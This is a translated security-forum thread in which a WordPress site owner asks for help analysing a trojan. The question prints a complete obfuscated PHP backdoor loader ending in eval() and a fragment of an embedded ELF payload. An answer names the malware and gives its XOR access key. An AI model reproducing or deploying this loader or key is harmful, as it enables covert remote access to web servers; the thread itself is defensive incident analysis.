Wordpress infectado con troyano

4

Recientemente, nuestro servidor (VPS CentOS6.5) comenzó a alojar un sitio WP que estaba, o se convirtió, en infectado (a través del complemento revslider) con algún tipo de troyano (probablemente remitente de correo no deseado, ya que terminamos en la lista de Spamhaus muy rápidamente)

El núcleo (pensamos) es un pequeño archivo agradable llamado system.php enlace

Lo que parece ser activado por un encabezado WP infectado header.php enlace

Logró crear 4 trabajos cron y estamos muy interesados en lo que estaba haciendo. ¿Cómo puedo averiguarlo?

Editar:
Aquí está header.php

<?php for($o=0,$e='&\'()*+,-.:]^_'{|,,,|-((.(*,|)')&(_(*,+)'(-(,+_(-(.(:(](^(_('({)]+'+{+|,&-^-_(^)](](^(_(^(:('(,-_(.-_(](:(,+_(-+_(--_('(.(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+{(:(:(^('(,(,(,(.(:(:(:+{(,(_(:(_+_(-)](](,(:-_(,,&(_,&+_(-('(:(.(,(.(.+_(-(.+'(,-_(.('(](.(_-^(,)](:({(,(,(_(](.(](.-^(,(,('(,(](:(.({(]-^+_(-(^+_(-(^(.(](,+'(',&(:+{(.-^(_-_('-_(]-^+_(-+{(:-^+_(--^(,(_(:(](,(_(')](:,&(.(,+_(-+{+_(-+|(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](.(.(.(](,+_(-(,,&(^('('(^(]-^(,(.(,(.(:-_+_(-(^(_)](.(.(.(](,+_(-(,,&(:(^(,(^(.+{+_(-({(,(^(^(,(_+_(-(_)](:(^(.-^(,(_(_(](]+|('('(.(.+_(--^(,(.(:+{+_(-+'('+_(-(:('(:-_(,,&(,-_(.+{(,+_(-(:)]('+_(-(.+{(_+_(-(_+'+_(-)]+_(-(_(,(.(:('(')]+_(-,&(:+'+_(--^(.(.('(_(,-^(:('(](]+_(-,&+_(-)](^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](:(_(:(,(,-_('+{(]-^(.('('-_+_(-(,(,(^(^-^+_(-('(,+'(:(_(:+|+_(-({('+{(],&(,(.(,(.(:-_+_(-(^+_(-)](](:(](^(_(:(')](^-_(_(:(^+'(_+'('+_(-(](^(_+_(-(^+{(^+{(^(,+_(-(.(:,&(,(:(:(_(](.(_(:(_,&+_(-(_(]-_+_(-)](^,&(,({(:+'(:+|(,)](:({(]+'(.(:(:(,(]+{(:(.(^(:(^(.(,({(:(:(:('(]+'(:(_+_(-(.(.-_(:(^(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:({+_(-)](.(,+_(--^(.(.(.(]+_(--^(_(.+_(--_(^+{(^(,(^({(:,&(,-_(:(^(,(:(.(](:(:(](:(_(.(^-^+_(-(:+_(-({(,,&(.+'+_(-(:(.(,+_(--^(.-_(:+{(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(,+_(-(:(:)](.(.(,-^(.({+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+'(,+'(.+_(-(,(_+_(-)](:+{(,-_(.(_(:+'(:(](.(,(]-^+_(-('(,({('(^('(^(.+'(:(^+_(--_(.(](:(^+_(--_(.+|(^)]+_(-+|(:(](:('(.+_(-(,(:(.(,+_(--^(:)]('-^(]+|(:(_(^-^+_(-('(,('(:-^(,(_(,-_(.+{(,-_(.)]('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(],&(_(_+_(-(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](,+|(,-_(:(.(:-_+_(-({(:+_(-(](^(^+'(]+|(.(.(:(_+_(-+'(:(_(,(](_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:-^(,+'(:(_(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(]+|(_)]('(_+_(-(]+_(--^(:+|(:+'+_(--^(:+'(,(^(.(](,)](,-^(:,&(^-_(,+_(-+_(--_(.+_(-('+_(-(],&(.(:+_(-({(.(^(:(^(:(](.+'(](_+_(-('(,(^('(^('(,(](:(_({(_(,(.-^(:(:(,,&(.+|(^({+_(-('(](:('(^(:+_(-(,+{(.(,(:(^(.-_(.-^(,-^(.(_+_(-+_(-(^-^(.+{(:(](.+|(,(](:(,+_(--^(.(:(:)](,(^+_(-+'(^(:(,+'(,(.(.+_(-(.,&+_(-)]('+{(],&(.-_(.-^(,-^(.(_+_(-+_(-(^+{(](.(_)](^(:(,-^(:(_(,+|(.(:(:({(,-^(_,&+_(-+_(-+_(-+_(-(,+'(:+|(,(_(,-_(.+{(,-_(.)]('+_(-(]('(_,&(^-^+_(-(:+_(-({(,,&(.)](,+{(.(,+_(-)](:-^(:-^+_(-)](:(,(]+'(,-^(,(:(:(:(.+'(:(^(.(,+_(-(:(:)](.(.(,-^(.({(]+'(,-^(,(:(:(:(.+'(:(^(.(,(,(.(.-_(:+'(,('+_(-+'(^(:(,+'(,-^(:+_(-(.(^+_(-(_(:+{(,+{(:)](,)]+_(-+{(.+'(](_+_(-('(,(^(.-^(.(^(,(.(:(.+_(-)]+_(-(^(.(_+_(-)](.+'(^(^(.,&(,(](.(.(:+|(,(](.-_+_(-(_(.(.(:('+_(-({+_(-+'(^(:(,+'(,-^(:+_(-('(,(](:(_({(_(,(.(:(:(,(](:(_(](^(^+_(-(:(,(^(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-('+_(-(:(:('(:+'(^(,('(:(,(](.(^('(_(,,&(:(,(^({+_(-+_(-+_(--_(:+{(:(_(,(](.(,(]+'(.+{(.(,(,+'(.+|(^+'+_(-(:(,)](:-^(:+|(],&('+'(^+_(-(:('(^+|(](](_+'(^(^+_(-+'(,-^(:+_(-(:(.(]+'(:+'(,+|(_+'(.+_(-(,-^(_(^(^(^+_(-(:(,(^('(.(:+'(,(^(:,&(,+|(.(:(:+_(-(_+_(-(.+_(-(^(:+_(-(](,(.(:+|(:+|(](.('(](,(.(.+{(.(^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('(](](_(,+'(:(,+_(--^(.+{(^(^(,(_(,(.(:,&(:('(:(^(:(_+_(-(.(.(:(.(^+_(--_(:(_+_(--^(^(^(,(.(:+|(:(,(:(^(:(](,-_(:-^('+_(-(](.(_+|(,,&('({(,-_(:('(:-_(,(:(:,&(,-_(_(.('+_(-(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(,)](,+'(.)](^+'(^(^(]('+_(-(.(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{(_)]+_(-('+_(-(:(:+{(.+'+_(--^(.(,(](.(_,&(:-_(,(^(.+|(_)]+_(-(^(,-^(.(_(,(_(,+{(:-_(,(_(_,&('-_(](.('-^(:+|+_(-(_(,-^(:(](:(,(,(](:(_(](.(_,&(:(^(,+'(.+{(_)]+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(_('-^(,(:(.(](](^(.,&(,(.(:+|(:(,(:(^(:(](,-_(:-^(.+'+_(-('(.,&(^('(,+_(-(:(](:+{(:('(,(:(,+|(,,&(.-_(.(.(:(](.(](^+'+_(--^(](.('+{(_(.(_(,(:+'(,+|(_(.('('(,({(.(](^({(.,&(,({(:,&(:('(,+|(:+'(,,&(_(:(.,&+_(-(:+_(-+'(^(.+_(-+{(,-^('+'('-^(,)](:(.(,(](_+'(:({(,(](:+_(-+_(-(_+_(-+_(-(,(](:+|(:-_(,(:(:(](],&(_(:(_,&+_(-(_(]-_+_(-)](^,&(,+|(:('(.,&(]+'(:(,(,(^(.(](:(,(,(.(.(.+_(-(_(,(](,+'(:-^(.+|(,-_(^)](,+|(:-_(:({(,({(:+_(-(^-_+_(-,&(,(^('(.(.+_(-(:(^(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,+_(-+_(-(:+'(,+|(_(.(:-^(,+'(:(_(_)]+_(-+{(,(^(:+{(,(_(,,&(:(_+_(--^(_(:(.,&+_(-)](.(,(](.(,('+_(-)](:+|('+_(-(.+'(:+'(,(](.(:(,)](,+|(.(,(](.(^+'(]-_(:+|('(,(](:(_({+_(-('(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|(,(:(.(](:-_(:(](.(.(^(:(,(_(:(](:(:(:(^(,(_('+'+_(-+_(-(_-^(:-^(^(_(,(^(^-_+_(-+|(,(.(,,&(:-^(,-_(.('(:(^(.+{(:+'(,('(_,&+_(--_(])]+_(-)](:('(.,&+_(--_(.+_(-(,(](_(.('(.(,(:+_(--^+_(-(.+_(-+|(:(_(,)]('-^(,(_(:+|(,)](.+{(:+'(:(](:(:(^('+_(--^+_(--^(:('('-^(:('('+'(^+_(-(:('(.+{(_+_(-(_+'+_(-)](^(.(,({(:+'(:+|(,)](:({(]+'(:)](:('(,,&(.(,+_(-(_+_(--_(,(](:(_(:+|(_(,(:+'(,+|(_(.(.-^(:(](.+|(^({+_(-+{(:(](:(^(:+|+_(--^('+{(],&(:)](:('(,,&(.(,(_)]+_(--_(,(](:(_(:+|(],&('+'(](:(:+_(-(.-^(:(](.+_(-(^-_+_(-('(](:('(^(:+'(,+{(:,&(]+'(.(](:)]+_(--_(_(^(^(:(,+'(,-^(:+_(-(_(:(]+'(.(,(,+{(.+|(:(:(]+{(.({(^)]+_(-(_(,-^('(.(:({(,)](.('(,(:(:+|(:(:(]+|(_+|(,,&(,-_(_+_(-(',&('(_+_(-)](:-^(,+{(:({(.(.(]+{(.(,(]-^+_(-('(,({('(.(:+_(-(,-_(:-_+_(-+'(.-_(.(]+_(-({(]-_(^(,(,('(,(^(:+_(-(.,&(,(:(:+|(,(](_+'(.-^(:(](:(^(^('(,+_(-+_(-({(.(_(:+_(-+_(-({(.(_(](.(_-^(:(^(](.(:-^('(_(,(.(,+'(.+_(-(.+'+_(--^(:+{+_(-({(:-_('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(,)](.+{(.+_(-(.(,+_(-)](.('(,-_(.('('-^(]-_(.(_+_(--_(])]+_(-(_(^({(:-_+_(--_(:,&(,)](:-^(:-_(,(](.+{+_(-(_(,+'(:(](.+_(-(:+_(-(,-_(:-_(,(_+_(-(^(:(:+_(-(:(.(,(^(^(^+'(]-_(:+_(-('(,+_(-+_(-(:(_(,)](.(.(:)](]+{(,(^(](^+_(-+'(,-^(:-^(:(^(:(^(:(_+_(-(.(.-_(:(^(](:(_+_(-(^(^(^+{(^(,(.-_(^(:(,+|(.(_(,(](.)](.(.(,(.(.+'(^({(^(.+_(-(:(,,&(.)](,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(,)](]-_(:,&(_(.(,(:(:(^(](.(_(.('(.(,,&('({('(_(,(.(,(](.(.(:+|(,(]('+{(]-^(.)]('+'(]+|(:('+_(-+_(-(^+{(](.('+{(.(.+_(-,&(:+{(,(:(.(_(:(:(](:(_(]('(_+_(-(](,-^(:,&(:-_(](.('('(,+|(_(:('-_+_(-(,(_+_(-(^)](^+|(^(_+_(-(.(:-_(,,&(:(_+_(--^(:)]('-^(]-_(.(:+_(--_(])]+_(-(_+_(-(.(.)](,)](:-_(,(^(:)](:(:(](:(_+_(-(^(,(^+{(^(,(.-_(:+|(,)](:+{(,(^(_+'('(.(,(]('-^(]+{('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,(.+_(-)](:,&(:+'(:(^(:+|+_(-+'(.-_(:({(](:(_+_(-(^(^(^+{+_(-(,('(_(:(_(^+_(-(:+'(,+|(_(.+_(-(_(,(.(:(_(_)](,(,(,-^(.+_(-(:(_+_(--_(.+_(-(,)](.-_('-^(]-_(:(^(,+{(:(.+_(-+{(.(,(:(_(,)](,+|(,(^(:+'(:(:(,(^(_,&+_(-(.+_(-+_(-(]('(:(:(.+{+_(-({(:(.+_(-(:(_(.(_(_(^(_('+{(^('(,(,+_(-)](:(:(.(,(](.('(]+_(-+'(.(:(.(_(,-^(_(.+_(-+'(^(^+_(-)]('(^('(,(](_(_(.(^('('(](:('+_(-)](:('(^('(,+{(](:('(^(.)](,(:(.(:(,-_(_,&('+'(]+|(:(.+_(-+_(-(^+{(]('(_(,(_(](^(](:(.+_(-({(:({(:('+_(-(.(_,&+_(-+_(-(,(.(,(.(.(.(:+|(],&('-_(],&(:,&('+_(-(](.(_+|+_(-+'(^(_(,,&('+{('(,(](:(.({(.+'(.+|(:(^(,('(.+'(](^+_(-('(](:('(_(:-_(:+_(-(_(:(:('(_(:(_,&+_(-+|(.,&(^-_+_(--^(,-^('+'('({(.+'(:(^(,-_(.(^(:(,(](:(_+_(-(^(,(.)](^+'(,-_('(,(](:(.({(]-^(.(^('({(^(_(,(^(^(,+_(-(^(,-^(.(_(.+'(](.('('(,+|+_(-+_(-(_('(:(_(_+|(,,&(,-_(.+{(:(](:+'(,(_(:+|+_(-)](.-_('-^(]-_(.(:(_,&(](:(:(_('+{(_(.(.+'(.(:+_(-({(.(^(:(^(:(](.(_(^+'+_(-,&+_(-({(:('('+_(-(]-^(.(:(](:('+_(-(.+{(,-^(.(_(^-^+_(-,&(]+{('(_(:(_(^+_(-(.-^(_(,(.+|(.(:(,(^(.(_(](.+_(-+{(,(](:+|(')]+_(-(.(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(.)](',&(,(^(_({(.+'(.-_(.-^(,-^(.(_+_(--^(^(_(,({('-^(',&(,(^('+'(^+_(-(.-_(:(^(,(:(.+'+_(-(_(:(.(,(.(:-_(.)](,(_(:+|(,-^(.-_('-^(])]+_(-)](^({(^(,(]('('(_(:(_(](:(_({+_(-('(](,(')](](](.+_(-(^)](^(.+_(-({(:-_(:({+_(-({(.('(]+'(.+|(:(:+_(--_(.(_(^-^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(]('('(_(.)](](_('('+_(-({(_(_('(.(,('(_+|(:+|(,)](_+_(-(^+{(:(,(,+|('+{(]-^(:)](_+{(.+{(.(:(](^+_(-,&(,({(:)](:(_+_(-+'(:(_(,(](_(.('(.(,+'(_)]+_(-(.(,(.(](.('+{(^(:(_(:(.({(_(,(](:(^-_(,(.(.(:+_(--^(^(_(,,&(_-_+_(-)](,+|(:+|+_(-+'(.-_(:({(](:(_+_(-(^+'(^-^(])](.(^(:+{(]({('+'(](:(](,(^-_(_(.(:-^(:+|('+{(_(.(^+{+_(-)](,+|(.(]+_(-({(.(:(.(.(,-^(_,&+_(-(.(,+_(-(]('('(,+_(--^(.-_(,('(]+'(_({('({(]-_(:('+_(-({(^(,(]+{+_(-+'(,,&(:-^(,(:(](^('+{('({(^+{+_(-)](](](.-^(,(^(,-^(.+{(:(_(:,&(]({(_(:(_,&(_+_(-(]+|(:-_('+{+_(-+|(:+'(:(,(,(_(:(_(](.(_+{+_(-(_(,,&(.(,(^)]+_(-(](](:('(_(.+'(](:('+'(_(,(](:(^-_(_(.(:-^(:+|('+{(_(.(^+{(^(,(]-^(:+_(-(^('(,+'(:(,+_(-)](.(,(^('+_(-(_(](:('(_(.+'(](_(_+{(^+{('(:(_(](](.('-^(:+|('+{(_(.(^+{(^(,(.+'(:(^+_(-,&(:({(:-_+_(--_(.(,+_(--^(^(_(,,&('-^(',&(,({('+'(^+_(-(](,(^-_(_(.(]+|(]+{('({(_(.(^+{(^(,(.+'(:(^(,)](.(_(:)]+_(-({(.(,+_(--^(^(_(,,&('+{(_(.(_(,(^+'(_(:(](:(:(:(,({(.,&(^)](^(.(])]+_(-,&+_(-(.(:(_(:,&(]({('+_(-(^+|(_(.(]+|(]+{('({(_(.(^+{+_(-)](,+|(:(,(,(_(.(^(.(^(,-^(_,&+_(-(.(,+_(-(](.(_)](^(:(_(:(.-^(_(,(:('(^+|(](](_+'(^(.+_(-,&(]+{(.+_(-(:(](,+{(.+_(-+_(--^(_+'(:(:+_(-(:(.(,(^(^('({(,,&(.('(:('(,)](.('(,(:(.(^(:({(]+{(:,&(_)](,+_(-(,(_(:(:(.+{+_(--^(,+|(,-_(:(.(:(:(,({(_,&+_(-(.+_(-+_(-(](.(^({(.(.(_(,(^+'(,(:(.+|('-^(]-_(.(_(,+{(]-_(^(_('(,(.-^(,(.(:+'(,)](.(.('(_+_(-({(:(,(](_+_(-('+_(-)](:(](:+|+_(--^(:(,(,(.(_+'(_('(^(^(_(^+_(-)]+_(-(_(,-^(.(]('(_(,(](.(_(,(_(.(_('(_(^)]('+{+_(-(_(^,&(,-_(:('(.-_(](^(:,&+_(--_(.(_(:+'(]+{(_(:+_(-(,(^(.(,-^(:+_(-(:+_(-(,(^('(:(.(^(,+_(-('(](](.(]-_(:-_(,)](_+_(-(^+{(^(,(,-_(:(,(,(.(.(^('(_(])](,+'(',&(.-^(,(^('(,(_(.(_(,(^+'+_(-('(](,(^-_(,-^(.)](](^+_(-('(,(.(:(]('+_(-(.+'(.(,+_(--^(:({(.(^+_(--_(:('+_(--^(^(_(,({('-^('+{+_(-)](.(_+_(-+'(.-_(.(](,,&(.(,(](.+_(-+_(-(,(:('(,('(,(](:(^)](_(:(:+_(-(^+|(_(.(]+|+_(-(.+_(-(:(^(_+_(-(.(:+|+_(-(.(.(:(,(_(.(^(:(.(,-^(_,&+_(-+_(-(^(.(]+|('-^(',&(,)]('+'(^+_(-(](,(^-_(_(.(:,&(_)](,+_(-+_(--^(.(.(:+|+_(-({(:(^(,-_(:-^(:(^(,(:(_,&+_(-(.+_(-(:(:(,(_(:(,(](](_('('(,+{+_(-+_(-(_(](:(_(_)]+_(-(.+_(-(:(:(,(_+_(-(,(](](_('('(,+{+_(-+_(-(_(.(:(_(_+|(,,&('({(_(.(.-_(^(:(_(:(:(_(,(_(:)](:(:(,(.(.(:+_(--^+_(-+'(,+'(.+_(-(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+{+_(-(,(.+'(,(_+_(-+'(:(.+_(-)](:)](.(.(,(:(:('(](:(^+'(]-_(:+_(-('(,(^+_(-(.-^(_(,(](:(:(:(,('(:(_(^(:+_(-+{(,,&('+'(:+_(-(,+{(.(,(:(^(:)](.-_+_(-({(:+_(-(^(:+_(--_(](.(.)](.+_(-(:(^(.(,+_(-(:(:)](.(.(,-^(.({+_(--^(^(_(,({('+{(_(.+_(-('(^)](_(:(.-_(:+'+_(-({(.(,(^-_+_(-(](](:(:+'(:({+_(-)](,+|+_(-)](.(.(:(:(,('(.)](_)]+_(-('+_(-(:(:('(:+'(](:(.({+_(-(.+_(-(^(.(^(,(:(.(,(^+'+_(--^(:(](:('(.+_(-(,-_(:(,(](.(_-^(:(^(](.('-^(]+{('({(_(.(:('(:(^+_(-)](:(_(,(:(.+|('-^(,(:(.(](](^(.,&+_(-+{(:,&(.)](,-_(:,&(](:(:+_(-(.-^(:(](:(^(^)](,(.(,-^(:+|('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(]+|(^(:+_(--^+_(-({(:('(:(,(,+|('+{(,(.(.+{(.(^(:(](:(^(](]+_(-,&(,({(,,&(:(_+_(-+'(:(_(,(](_(:(.,&+_(-(:+_(-+'(](_(,(,(,(](:+_(-(,(_(,(^(.(:(,-_(.(]('-^(]-_(.(_+_(--_(])]+_(-(_(^({(^(,(,-_(:-_+_(-)](.-_(:-_(,,&(_,&(^-^+_(-(:+_(-({(,,&(:+|+_(-(.(:(_(,)](_(:(.,&+_(-(:+_(-+'(^(:(,+'(,-^(:+_(-('+_(-(]-^(:(,(](:('+_(-(.+{(_+_(-(:({(:+|(^,&(](](:(^(:(_(_(,('('(,(]('('('+_(-(:({(.-_('+|(.(](,(,+_(-('(_-_+_(-({(:({(:({+_(-(:(:+|(]+|('-^(:+|(^(_(,({(_-_(',&(:(^+_(-(,(.(^(,(^+_(-,&(.(.(,(,(_,&(^(_(,(^(,-_(_(.(_(,(:+'(,+|(_(.+_(-(_(,-^(.({(](_(,(_+_(-(.('+'(',&(,)]('+'(](:(:+_(-('(.(,({('({+_(-(.(.,&(:+{+_(-,&(,+'(:-^(,({(]-^(.(](,+{(^(,(:({(:+|+_(-+{(,,&('+'+_(-)](,-_(:-^+_(-+'(:-^(.-_(](:(_+_(-(^(^(^+{(](.(.)](',&(,)](_-^(]-^+_(-(^+_(-+_(-(.-^+_(-+_(-(_,&(^(_(,(^(,-_(_(.+_(-('(^)](,(:(.+|('-^(.+{(.(.(^(:(,(_(:(](:-_(:({(,,&(:+'(,)]+_(-(^(.('+_(--^(.+'(](.+_(-('+_(-({(,,&(:-^+_(-+'(:(,(](.(_(:('-_+_(-(,(_+_(-(^(^(]-_+_(-({(.(_(.+{(,(:(.(:+_(-)](.(_(:('+_(-({(.,&(^(:(,+_(-(](:('(_(:+'(](:(_({+_(-('(](,(.-^(:(](:(_(^+{+_(-(:+_(-)](.(_(,(_(,-_(.+{(,-_(.)]('-^(]-_(.(_+_(--_(])](_+_(-(-(_(*,*)'(-(-)^*&,|-(,*(.(*,++^(*,|+'(:)^(*,|(^(^(:-^,:,,(.(*,|)_)\'),(:-^(*,.+^(*,++^(*,|+'+')'(*,|)^-',+,_-),+-^(*,*({)'*&,),.-((.(.(*,.+^(*,++^(*,|+'+')_)_)*(:(^(.(*,.+^(*,++^(^(^(*,|+'+'(:(:)^-'-',:,,(.(\'*&,:-)-),+-*(.(*+|+)*++(+,*++((:(:-^(*+|*)*|*|*^*:*+)'(,(**.+*+*+&+|*)*|*|*^*:*++|+,*\'+(+))^(*+|+&*|+)+*)'(,(**.+*+*+&+|+&*|+)+*+|+,*\'+(+))^(*+|*-*++*)'(,(**.+*+*+&+|*-*++*+|+,*\'+(+))^-'(*,^)'(*+|*)*|*|*^*:*++^(-,^,+-:(-+')^,:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|+&*|+)+*+^(-,^,+-:(-+')^-',:,,(.,+,'-&-*-:(.(*,^(:(:-^(*,^)'(*+|*-*++*+^(-,^,+-:(-+')^-',:,,(.(\'*&,,-+,{,)-*,:,|,{+|,+-.,:-)-*-)(.(-,*,+,)-(-:-&-*(-(:(:-^,+-,,\',_(.(-,,-+,{,)-*,:,|,{(&,*,+,)-(-:-&-*(.(*,+(_(*,^(:-^,:,,(.(\'(*,^(:-^-(,+-*-+-(,{)^-'(*,+,_)'*&-)-*-(,_,+,{(.(*,+(:)^(*,^,_)'*&-)-*-(,_,+,{(.(*,^(:)^(*-(,_)'(*,+,_(+(*,^,_)^(*,,,_)'(*,+,_('(*-(,_)^,,,|-((.(*,|)')&)^(*,|)_(*,,,_)^(*,|(^)'(*,^,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,|(_(*,^,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-',:,,(.(*-(,_(:-^(*-&)'*&-)-+,(-)-*-((.(*,+(_(*,,,_(_(*-(,_(:)^(*,^)'*&-)-+,(-)-*-((.(*,^(_)&(_(*-(,_(:)^(*,*({)'(((*,^((+{(((*-&(()^-'-(,+-*-+-(,{(.(*,*(:)^-'(-(:)^-'(*,*)'*&,*,+,)-(-:-&-*(.(*,*(_(*,^(:)^,+-,,\',_(.(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>  

y aquí hay una parte de los comandos & codificación utilizada en system.php
(demasiado grande para publicar aquí en su totalidad, vea el pastebin)

@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x20\x0d\x00\x00\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03  

¿Alguien reconoce el tipo de codificación, así que puedo decodificar e investigar más a mí mismo?

Edición 2:
descubrimos que system.php usa codificación hexadecimal (descodificada enlace )
TL; DR es un ELF . ¿Hay alguna forma de averiguar qué hace, además de ejecutarlo en un cuadro de prueba?

    
pregunta RozzA 01.09.2015 - 02:03
fuente

3 respuestas

4

¡Creo que eres el orgulloso propietario de una puerta trasera "libworker.so"! Malware Must Die tiene un buen análisis de esto, lea eso antes de ejecutarlo usted mismo. El autor de Malware Must Die no habla inglés de forma nativa, pero revela un montón de detalles.

Malware Must Die tiene el código "descargador" de PHP que se descarga a través de una copia de "Web Shell by oRb", por lo que tendrá que revisar el sitio pirateado de WordPress con un peine de dientes finos. Me gustaría grep para "eval (" como principio en cada archivo.

La segunda pasta ( header.php ) parece un programa de puerta de enlace. Hay un par de niveles de ofuscación que ocultan un programa que incluye un fragmento de código cifrado y un programa de descifrado que es exclusivo a nivel de bits, la clave contra el fragmento cifrado, y luego evalúa el código descifrado. Dado que el archivo header.php lleva el código cifrado, y la cadena de clave aparece en una solicitud HTTP, ese código probablemente contiene un nombre de host o dirección IP o algo que le permita rastrear la fuente. Me atrevo a suponer que el código encriptado es una especie de puerta de enlace de archivos. Es decir, alguien llama a su servidor web con la URL header.php y una cookie especial, o algunos parámetros GET o POST, junto con un nombre de archivo. El código descifrado recupera el archivo de algún lugar y lo pasa a la persona que llama header.php . Sin embargo, eso es solo una conjetura.

Es posible que pueda recuperar la clave de cifrado si alguien llamado header.php como HTTP GET, con un parámetro key=blahblah . Podría valer la pena echarle un vistazo a access_log para estar seguro.

ACTUALIZAR :

El texto cifrado header.php se puede recuperar con una cadena de clave de "SjJVkE6rkRYj", 12 letras ACII, sin comillas. Finalmente reconocí la rutina del descifrador, y busqué en Google para eso. Hacker News tiene una buena explicación sobre cómo obtener una cadena de clave de cifrado Xor. Hay una cadena de comentarios de Hacker News aún más antigua sobre la misma clave / script, y eso lleva a una pasta del mismo código que obtengo cuando descifro su texto encriptado header.php . Es el "superfetch" malware PHP , y si bien es una puerta de enlace de archivos, como predije anteriormente, no contiene direcciones IP ni nombres de host. En su lugar, el código de la puerta de enlace utiliza una URL que llega en un GET o POST con el parámetro llamado "SjJVkE6rkRYj", o en una cookie que tiene el mismo parámetro. Eso es inteligente, pero solo oculto, no asegurado.

    
respondido por el Bruce Ediger 01.09.2015 - 19:41
fuente
1

¿Ha buscado en / var / spool / cron y / etc / crontab o en cualquier otro subdirectorio CRON dentro de / var o / etc? Quizás puedas ver los trabajos cron programados aquí.

Si ya ha determinado que el archivo ELF era parte de la infección, para responder a la última parte de su pregunta, solo lo ejecutaría en un entorno de espacio aislado si desea obtener una visión real de lo que hace. Espero que esto ayude.

    
respondido por el shift_tab 01.09.2015 - 17:58
fuente
-1

La codificación del shellcode es una referencia hexadecimal básica. El ELF es probable que esté relacionado con la botnet Ramnit.

    
respondido por el Alex Davies 02.09.2015 - 08:20
fuente

Lea otras preguntas en las etiquetas